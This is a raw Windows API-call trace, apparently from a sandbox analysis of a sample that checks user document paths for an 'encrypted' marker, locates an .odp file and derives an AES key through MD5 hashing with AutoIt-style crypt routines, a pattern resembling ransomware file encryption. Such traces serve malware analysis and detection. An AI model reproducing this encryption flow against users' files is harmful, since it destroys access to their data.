(Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Htr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tr5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r5Pk.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.521] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.521] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.521] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.521] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.521] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.521] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.521] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.521] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.521] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.521] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0xb9c3ef0, ftLastWriteTime.dwHighDateTime=0x1d5bf47, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 0x7c2240 [0033.521] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.521] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.521] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.521] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.521] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.521] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.522] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.522] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.522] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.522] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.522] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.522] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.522] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.522] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.522] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.522] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.523] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.523] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.523] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.523] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.523] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.523] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.523] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.523] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.523] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.524] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.524] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.524] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.524] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.524] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.524] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.524] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.524] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.524] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.524] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.525] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.525] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.525] CryptHashData (hHash=0x7c2100, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.525] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.525] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.525] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.525] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0033.525] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 